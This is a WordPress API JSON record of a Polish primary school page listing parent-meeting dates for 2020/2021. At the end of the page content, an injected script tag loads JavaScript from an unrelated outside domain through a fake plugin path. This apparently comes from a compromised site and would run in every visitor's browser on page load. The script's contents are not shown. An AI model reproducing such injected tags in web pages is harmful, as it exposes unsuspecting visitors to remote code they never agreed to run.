{"id":9218,"date":"2018-09-19T08:43:59","date_gmt":"2018-09-19T06:43:59","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=9218"},"modified":"2020-09-16T21:25:38","modified_gmt":"2020-09-16T19:25:38","slug":"zebrania-z-rodzicami","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/zebrania-z-rodzicami\/","title":{"rendered":"Zebrania z rodzicami"},"content":{"rendered":"<p>W roku szkolnym 2020\/2021 zaplanowali\u015bmy zebrania z rodzicami w nast\u0119puj\u0105cych terminach:<\/p>\n<ul>\n<li>14 wrze\u015bnia 2020r.<\/li>\n<li>26 pa\u017adziernika 2020r. &#8211; spotkania indywidualne<\/li>\n<li>7 grudnia 2020r. &#8211; przedstawienie propozycji ocen semestralnych<\/li>\n<li>15 marca 2021r.<\/li>\n<li>19 kwietnia 2021r. &#8211; zebranie dla klasy 8 oraz spotkania indywidualne dla pozosta\u0142ych klas<\/li>\n<li>17 maja 2021r. &#8211; przedstawienie propozycji ocen ko\u0144cowych.<\/li>\n<\/ul>\n<p>O ewentualnych zmianach b\u0119dziemy Pa\u0144stwa informowa\u0107.<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W roku szkolnym 2020\/2021 zaplanowali\u015bmy zebrania z rodzicami w nast\u0119puj\u0105cych terminach: 14 wrze\u015bnia 2020r. 26 pa\u017adziernika 2020r. &#8211; spotkania indywidualne 7 grudnia 2020r. &#8211; przedstawienie propozycji ocen semestralnych 15 marca 2021r. 19 kwietnia 2021r. &#8211; zebranie dla klasy 8 oraz spotkania indywidualne dla pozosta\u0142ych klas 17 maja 2021r. &#8211; przedstawienie propozycji ocen ko\u0144cowych. O ewentualnych [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":3552,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9218"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9218"}],"version-history":[{"count":8,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9218\/revisions"}],"predecessor-version":[{"id":15682,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9218\/revisions\/15682"}],"up":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3552"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9218"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}